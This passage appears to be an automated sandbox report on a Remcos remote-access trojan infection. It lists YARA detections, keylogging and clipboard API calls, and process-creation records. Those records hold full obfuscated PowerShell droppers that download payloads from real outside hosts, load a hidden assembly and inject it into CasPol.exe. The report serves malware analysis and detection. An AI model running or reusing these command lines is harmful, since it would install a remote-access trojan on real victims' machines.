                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,13_2_004159C6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,13_2_004159C6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_00409B10 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,13_2_00409B10
                    Source: Yara matchFile source: 13.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.2047488224.0000000005CCD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 8032, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 5480, type: MEMORYSTR

                    E-Banking Fraud

                    barindex
                    Source: Yara matchFile source: 13.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.4110277483.0000000000E47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.2047488224.0000000005CCD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 8032, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 5480, type: MEMORYSTR

                    Spam, unwanted Advertisements and Ransom Demands

                    barindex
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_0041BB71 SystemParametersInfoW,13_2_0041BB71
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_0041BB77 SystemParametersInfoW,13_2_0041BB77

                    System Summary

                    barindex
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sysTEm32\WInDowSpoWeRShell\V1.0\POwersheLL.exE" "powErsHEll.eXE -EX BYpaSs -noP -W 1 -C dEViCEcReDEntIaLDEployMENt ; IeX($(iEX('[SYsTem.tExT.EnCoDINg]'+[ChAR]0x3a+[ChaR]0x3a+'utF8.GeTSTrING([SystEM.cOnvERt]'+[CHAR]0x3a+[cHAR]58+'FrOMbASe64STrING('+[CHAr]34+'JFM1UFpiNiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtVHlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1iZVJERUZpTkl0aU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTE1PTi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBaLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhwSGhsTndBLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFRSdEdKUEJ0ZSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaEFVYVRQUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjTWFReEFTWWhsSyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInhaQm5VRSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNRXNQYWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ0NzVWlPTklmICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRTNVBaYjY6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDQuMTY4LjQ2LjI2LzE0MjIvYmVzdG9mdGhpbmdzd2l0aGVudGlyZXRpbWVnaXZlbmVic3R0aGlnbnN0b2Rvd2l0aGdyZWF0LnRJRiIsIiRFblY6QVBQREFUQVxiZXN0b2Z0aGluZ3N3aXRoZW50aXJldGltZWdpdmVuZWJzdHRoaWduc3RvZG93aXRoZy52QnMiLDAsMCk7U3RhclQtc2xFRVAoMyk7SWkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXGJlc3RvZnRoaW5nc3dpdGhlbnRpcmV0aW1lZ2l2ZW5lYnN0dGhpZ25zdG9kb3dpdGhnLnZCcyI='+[cHaR]0x22+'))')))"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX BYpaSs -noP -W 1 -C dEViCEcReDEntIaLDEployMENt
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnMmtkaW1hZycrJ2VVcmwgPSBlQzRodHRwczovLzMxMDUuZmlsZW1haWwuY29tL2FwaS9maWxlLycrJ2dldD9maWxla2V5PXMnKydoVFBIYkNQWDhvLWxPdENxSExHNl8weEN5LXhsNHRueGxBVmJROTUtJysnZHZpVEs1Y0FSYU5kUWpiYjNtZXhmd1F6S21UWGcmc2tpcHJlZz10cnVlJnBrX3ZpZD1lMDEwOTYzOGM5YmZiOTU3MTczMjUzMTMwOWI1ZmY3YyBlQzQ7Mmtkd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDsya2RpbWFnZUJ5dGVzID0gMmtkd2ViQ2xpZW50LkRvdycrJ24nKydsb2FkRGF0YSgya2RpbWFnZVVybCk7MmtkaW1hZ2VUZXh0ID0gJysnW1N5c3RlbS5UZScrJ3h0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoMmtkaW1hZ2VCeXRlcycrJyk7Mmtkc3RhcnRGbGFnID0gZUM0PDxCQVNFNjRfU1RBUlQ+PmVDJysnNDsya2RlbmRGbGFnID0gZUM0PDxCQVNFNjRfRU5EPj5lQzQ7Mmtkc3RhcnRJbmRleCA9IDJrZGltYWdlVGV4dC5JbmRleE9mKDJrZHN0YXJ0RmxhZyk7MmtkZScrJ24nKydkSW5kZXggPSAya2RpbWFnZVRleHQuSW5kZXgnKydPZigya2RlbmRGbGEnKydnKTsya2RzdGFydEluZGV4IC1nZSAwIC1hbmQgMmtkZW5kSW5kZXggLWd0IDJrZHN0YXInKyd0SW5kZXg7Mmtkc3RhcnRJbmRleCArPSAya2RzdGFydEZsYWcuTGVuZ3QnKydoOzJrZGJhc2U2NExlbmd0aCA9IDJrZGVuZEluZGV4IC0gMmtkc3RhcnRJbmRleDsya2RiYXNlNjRDb21tYW5kID0gMmsnKydkaW1hZ2VUJysnZXh0LlN1YnN0cmluZygya2RzdGFydEluZGV4LCAya2RiYXNlNjRMZW5ndGgpOzJrZGJhc2U2NFJlJysndmVyc2VkID0gLWpvaW4gKDJrZGJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBzeVYgRm9yRWFjaC1PYmplY3QgeyAya2RfIH0pWy0xLi4tKDJrZGJhc2U2NENvbW1hbmQuTGVuZ3RoKV07MmtkY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhcycrJ2U2NFN0cmluZygya2RiYXNlNjRSZXZlcnNlZCk7MmtkbG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKDJrZGNvbW1hbmRCeXRlcyk7MmtkdmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChlQzRWQUllQzQpOzJrZHZhaU1ldGhvZC5JbnZva2UoJysnMmtkbnVsbCwgQChlQzR0eHQuRkdWR0ZSLzIyNDEvNjIuNjQuOCcrJzYxLjQwMS8vOnB0dGhlQzQsIGVDNGRlc2F0aXZhZG9lQzQsIGVDNGRlc2F0aXZhZG9lQzQsIGVDNGRlc2F0aXZhZG9lQzQsJysnIGVDNENhc1BvbGVDNCwgZUM0ZGVzYXRpdmFkb2VDNCwgZUM0ZGVzYXRpdmFkb2VDNCxlQycrJzRkZXNhdGl2YWRvJysnZUM0LGVDNGRlc2F0aScrJ3ZhZG9lQzQsZUM0ZGVzYXRpdmFkb2VDNCxlQzRkZXNhdGl2YWRvZUM0LGVDNGRlc2F0aXZhZG9lQycrJzQsZUM0MWVDNCxlQzRkZXNhdGl2YWRvZUM0KSk7JykgIC1jcmVwbEFDZSAgKFtjaEFSXTExNStbY2hBUl0xMjErW2NoQVJdODYpLFtjaEFSXTEyNCAgLVJlUExBY2UgIChbY2hBUl01MCtbY2hBUl0xMDcrW2NoQVJdMTAwKSxbY2hBUl0zNiAtY3JlcGxBQ2UnZUM0JyxbY2hBUl0zOSl8IC4oKGd2ICcqTURyKicpLk5BTWVbMywxMSwyXS1qT2lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('2kdimag'+'eUrl = eC4https://3105.filemail.com/api/file/'+'get?filekey=s'+'hTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-'+'dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c eC4;2kdwebClient = New-Object System.Net.WebClient;2kdimageBytes = 2kdwebClient.Dow'+'n'+'loadData(2kdimageUrl);2kdimageText = '+'[System.Te'+'xt.Encoding]::UTF8.GetString(2kdimageBytes'+');2kdstartFlag = eC4<<BASE64_START>>eC'+'4;2kdendFlag = eC4<<BASE64_END>>eC4;2kdstartIndex = 2kdimageText.IndexOf(2kdstartFlag);2kde'+'n'+'dIndex = 2kdimageText.Index'+'Of(2kdendFla'+'g);2kdstartIndex -ge 0 -and 2kdendIndex -gt 2kdstar'+'tIndex;2kdstartIndex += 2kdstartFlag.Lengt'+'h;2kdbase64Length = 2kdendIndex - 2kdstartIndex;2kdbase64Command = 2k'+'dimageT'+'ext.Substring(2kdstartIndex, 2kdbase64Length);2kdbase64Re'+'versed = -join (2kdbase64Command.ToCharArray() syV ForEach-Object { 2kd_ })[-1..-(2kdbase64Command.Length)];2kdcommandBytes = [System.Convert]::FromBas'+'e64String(2kdbase64Reversed);2kdloadedAssembly = [System.Reflection.Assembly]::Load(2kdcommandBytes);2kdvaiMethod = [dnlib.IO.Home].GetMethod(eC4VAIeC4);2kdvaiMethod.Invoke('+'2kdnull, @(eC4txt.FGVGFR/2241/62.64.8'+'61.401//:pttheC4, eC4desativadoeC4, eC4desativadoeC4, eC4desativadoeC4,'+' eC4CasPoleC4, eC4desativadoeC4, eC4desativadoeC4,eC'+'4desativado'+'eC4,eC4desati'+'vadoeC4,eC4desativadoeC4,eC4desativadoeC4,eC4desativadoeC'+'4,eC41eC4,eC4desativadoeC4));') -creplACe ([chAR]115+[chAR]121+[chAR]86),[chAR]124 -RePLAce ([chAR]50+[chAR]107+[chAR]100),[chAR]36 -creplACe'eC4',[chAR]39)| .((gv '*MDr*').NAMe[3,11,2]-jOiN'')"
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sysTEm32\WInDowSpoWeRShell\V1.0\POwersheLL.exE" "powErsHEll.eXE -EX BYpaSs -noP -W 1 -C dEViCEcReDEntIaLDEployMENt ; IeX($(iEX('[SYsTem.tExT.EnCoDINg]'+[ChAR]0x3a+[ChaR]0x3a+'utF8.GeTSTrING([SystEM.cOnvERt]'+[CHAR]0x3a+[cHAR]58+'FrOMbASe64STrING('+[CHAr]34+'JFM1UFpiNiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtVHlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1iZVJERUZpTkl0aU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTE1PTi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBaLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhwSGhsTndBLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFRSdEdKUEJ0ZSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaEFVYVRQUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjTWFReEFTWWhsSyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInhaQm5VRSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNRXNQYWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ0NzVWlPTklmICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRTNVBaYjY6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDQuMTY4LjQ2LjI2LzE0MjIvYmVzdG9mdGhpbmdzd2l0aGVudGlyZXRpbWVnaXZlbmVic3R0aGlnbnN0b2Rvd2l0aGdyZWF0LnRJRiIsIiRFblY6QVBQREFUQVxiZXN0b2Z0aGluZ3N3aXRoZW50aXJldGltZWdpdmVuZWJzdHRoaWduc3RvZG93aXRoZy52QnMiLDAsMCk7U3RhclQtc2xFRVAoMyk7SWkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXGJlc3RvZnRoaW5nc3dpdGhlbnRpcmV0aW1lZ2l2ZW5lYnN0dGhpZ25zdG9kb3dpdGhnLnZCcyI='+[cHaR]0x22+'))')))"Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX BYpaSs -noP -W 1 -C dEViCEcReDEntIaLDEployMENtJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnMmtkaW1hZycrJ2VVcmwgPSBlQzRodHRwczovLzMxMDUuZmlsZW1haWwuY29tL2FwaS9maWxlLycrJ2dldD9maWxla2V5PXMnKydoVFBIYkNQWDhvLWxPdENxSExHNl8weEN5LXhsNHRueGxBVmJROTUtJysnZHZpVEs1Y0FSYU5kUWpiYjNtZXhmd1F6S21UWGcmc2tpcHJlZz10cnVlJnBrX3ZpZD1lMDEwOTYzOGM5YmZiOTU3MTczMjUzMTMwOWI1ZmY3YyBlQzQ7Mmtkd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDsya2RpbWFnZUJ5dGVzID0gMmtkd2ViQ2xpZW50LkRvdycrJ24nKydsb2FkRGF0YSgya2RpbWFnZVVybCk7MmtkaW1hZ2VUZXh0ID0gJysnW1N5c3RlbS5UZScrJ3h0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoMmtkaW1hZ2VCeXRlcycrJyk7Mmtkc3RhcnRGbGFnID0gZUM0PDxCQVNFNjRfU1RBUlQ+PmVDJysnNDsya2RlbmRGbGFnID0gZUM0PDxCQVNFNjRfRU5EPj5lQzQ7Mmtkc3RhcnRJbmRleCA9IDJrZGltYWdlVGV4dC5JbmRleE9mKDJrZHN0YXJ0RmxhZyk7MmtkZScrJ24nKydkSW5kZXggPSAya2RpbWFnZVRleHQuSW5kZXgnKydPZigya2RlbmRGbGEnKydnKTsya2RzdGFydEluZGV4IC1nZSAwIC1hbmQgMmtkZW5kSW5kZXggLWd0IDJrZHN0YXInKyd0SW5kZXg7Mmtkc3RhcnRJbmRleCArPSAya2RzdGFydEZsYWcuTGVuZ3QnKydoOzJrZGJhc2U2NExlbmd0aCA9IDJrZGVuZEluZGV4IC0gMmtkc3RhcnRJbmRleDsya2RiYXNlNjRDb21tYW5kID0gMmsnKydkaW1hZ2VUJysnZXh0LlN1YnN0cmluZygya2RzdGFydEluZGV4LCAya2RiYXNlNjRMZW5ndGgpOzJrZGJhc2U2NFJlJysndmVyc2VkID0gLWpvaW4gKDJrZGJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBzeVYgRm9yRWFjaC1PYmplY3QgeyAya2RfIH0pWy0xLi4tKDJrZGJhc2U2NENvbW1hbmQuTGVuZ3RoKV07MmtkY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhcycrJ2U2NFN0cmluZygya2RiYXNlNjRSZXZlcnNlZCk7MmtkbG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKDJrZGNvbW1hbmRCeXRlcyk7MmtkdmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChlQzRWQUllQzQpOzJrZHZhaU1ldGhvZC5JbnZva2UoJysnMmtkbnVsbCwgQChlQzR0eHQuRkdWR0ZSLzIyNDEvNjIuNjQuOCcrJzYxLjQwMS8vOnB0dGhlQzQsIGVDNGRlc2F0aXZhZG9lQzQsIGVDNGRlc2F0aXZhZG9lQzQsIGVDNGRlc2F0aXZhZG9lQzQsJysnIGVDNENhc1BvbGVDNCwgZUM0ZGVzYXRpdmFkb2VDNCwgZUM0ZGVzYXRpdmFkb2VDNCxlQycrJzRkZXNhdGl2YWRvJysnZUM0LGVDNGRlc2F0aScrJ3ZhZG9lQzQsZUM0ZGVzYXRpdmFkb2VDNCxlQzRkZXNhdGl2YWRvZUM0LGVDNGRlc2F0aXZhZG9lQycrJzQsZUM0MWVDNCxlQzRkZXNhdGl2YWRvZUM0KSk7JykgIC1jcmVwbEFDZSAgKFtjaEFSXTExNStbY2hBUl0xMjErW2NoQVJdODYpLFtjaEFSXTEyNCAgLVJlUExBY2UgIChbY2hBUl01MCtbY2hBUl0xMDcrW2NoQVJdMTAwKSxbY2hBUl0zNiAtY3JlcGxBQ2UnZUM0JyxbY2hBUl0zOSl8IC4oKGd2ICcqTURyKicpLk5BTWVbMywxMSwyXS1qT2lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('2kdimag'+'eUrl = eC4https://3105.filemail.com/api/file/'+'get?filekey=s'+'hTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-'+'dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c eC4;2kdwebClient = New-Object System.Net.WebClient;2kdimageBytes = 2kdwebClient.Dow'+'n'+'loadData(2kdimageUrl);2kdimageText = '+'[System.Te'+'xt.Encoding]::UTF8.GetString(2kdimageBytes'+');2kdstartFlag = eC4<<BASE64_START>>eC'+'4;2kdendFlag = eC4<<BASE64_END>>eC4;2kdstartIndex = 2kdimageText.IndexOf(2kdstartFlag);2kde'+'n'+'dIndex = 2kdimageText.Index'+'Of(2kdendFla'+'g);2kdstartIndex -ge 0 -and 2kdendIndex -gt 2kdstar'+'tIndex;2kdstartIndex += 2kdstartFlag.Lengt'+'h;2kdbase64Length = 2kdendIndex - 2kdstartIndex;2kdbase64Command = 2k'+'dimageT'+'ext.Substring(2kdstartIndex, 2kdbase64Length);2kdbase64Re'+'versed = -join (2kdbase64Command.ToCharArray() syV ForEach-Object { 2kd_ })[-1..-(2kdbase64Command.Length)];2kdcommandBytes = [System.Convert]::FromBas'+'e64String(2kdbase64Reversed);2kdloadedAssembly = [System.Reflection.Assembly]::Load(2kdcommandBytes);2kdvaiMethod = [dnlib.IO.Home].GetMethod(eC4VAIeC4);2kdvaiMethod.Invoke('+'2kdnull, @(eC4txt.FGVGFR/2241/62.64.8'+'61.401//:pttheC4, eC4desativadoeC4, eC4desativadoeC4, eC4desativadoeC4,'+' eC4CasPoleC4, eC4desativadoeC4, eC4desativadoeC4,eC'+'4desativado'+'eC4,eC4desati'+'vadoeC4,eC4desativadoeC4,eC4desativadoeC4,eC4desativadoeC'+'4,eC41eC4,eC4desativadoeC4));') -creplACe ([chAR]115+[chAR]121+[chAR]86),[chAR]124 -RePLAce ([chAR]50+[chAR]107+[chAR]100),[chAR]36 -creplACe'eC4',[chAR]39)| .((gv '*MDr*').NAMe[3,11,2]-jOiN'')"Jump to behavior
                    Source: 13.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 13.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 13.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 13.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 13.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 13.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 00000009.00000002.2047488224.0000000005CCD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: Process Memory Space: powershell.exe PID: 7916, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                    Source: Process Memory Space: powershell.exe PID: 8032, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: Process Memory Space: powershell.exe PID: 8032, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                    Source: Process Memory Space: CasPol.exe PID: 5480, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnMmtkaW1hZycrJ2VVcmwgPSBlQzRodHRwczovLzMxMDUuZmlsZW1haWwuY29tL2FwaS9maWxlLycrJ2dldD9maWxla2V5PXMnKydoVFBIYkNQWDhvLWxPdENxSExHNl8weEN5LXhsNHRueGxBVmJROTUtJysnZHZpVEs1Y0FSYU5kUWpiYjNtZXhmd1F6S21UWGcmc2tpcHJlZz10cnVlJnBrX3ZpZD1lMDEwOTYzOGM5YmZiOTU3MTczMjUzMTMwOWI1ZmY3YyBlQzQ7Mmtkd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDsya2RpbWFnZUJ5dGVzID0gMmtkd2ViQ2xpZW50LkRvdycrJ24nKydsb2FkRGF0YSgya2RpbWFnZVVybCk7MmtkaW1hZ2VUZXh0ID0gJysnW1N5c3RlbS5UZScrJ3h0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoMmtkaW1hZ2VCeXRlcycrJyk7Mmtkc3RhcnRGbGFnID0gZUM0PDxCQVNFNjRfU1RBUlQ+PmVDJysnNDsya2RlbmRGbGFnID0gZUM0PDxCQVNFNjRfRU5EPj5lQzQ7Mmtkc3RhcnRJbmRleCA9IDJrZGltYWdlVGV4dC5JbmRleE9mKDJrZHN0YXJ0RmxhZyk7MmtkZScrJ24nKydkSW5kZXggPSAya2RpbWFnZVRleHQuSW5kZXgnKydPZigya2RlbmRGbGEnKydnKTsya2RzdGFydEluZGV4IC1nZSAwIC1hbmQgMmtkZW5kSW5kZXggLWd0IDJrZHN0YXInKyd0SW5kZXg7Mmtkc3RhcnRJbmRleCArPSAya2RzdGFydEZsYWcuTGVuZ3QnKydoOzJrZGJhc2U2NExlbmd0aCA9IDJrZGVuZEluZGV4IC0gMmtkc3RhcnRJbmRleDsya2RiYXNlNjRDb21tYW5kID0gMmsnKydkaW1hZ2VUJysnZXh0LlN1YnN0cmluZygya2RzdGFydEluZGV4LCAya2RiYXNlNjRMZW5ndGgpOzJrZGJhc2U2NFJlJysndmVyc2VkID0gLWpvaW4gKDJrZGJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBzeVYgRm9yRWFjaC1PYmplY3QgeyAya2RfIH0pWy0xLi4tKDJrZGJhc2U2NENvbW1hbmQuTGVuZ3RoKV07MmtkY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhcycrJ2U2NFN0cmluZygya2RiYXNlNjRSZXZlcnNlZCk7MmtkbG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKDJrZGNvbW1hbmRCeXRlcyk7MmtkdmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChlQzRWQUllQzQpOzJrZHZhaU1ldGhvZC5JbnZva2UoJysnMmtkbnVsbCwgQChlQzR0eHQuRkdWR0ZSLzIyNDEvNjIuNjQuOCcrJzYxLjQwMS8vOnB0dGhlQzQsIGVDNGRlc2F0aXZhZG9lQzQsIGVDNGRlc2F0aXZhZG9lQzQsIGVDNGRlc2F0aXZhZG9lQzQsJysnIGVDNENhc1BvbGVDNCwgZUM0ZGVzYXRpdmFkb2VDNCwgZUM0ZGVzYXRpdmFkb2VDNCxlQycrJzRkZXNhdGl2YWRvJysnZUM0LGVDNGRlc2F0aScrJ3ZhZG9lQzQsZUM0ZGVzYXRpdmFkb2VDNCxlQzRkZXNhdGl2YWRvZUM0LGVDNGRlc2F0aXZhZG9lQycrJzQsZUM0MWVDNCxlQzRkZXNhdGl2YWRvZUM0KSk7JykgIC1jcmVwbEFDZSAgKFtjaEFSXTExNStbY2hBUl0xMjErW2NoQVJdODYpLFtjaEFSXTEyNCAgLVJlUExBY2UgIChbY2hBUl01MCtbY2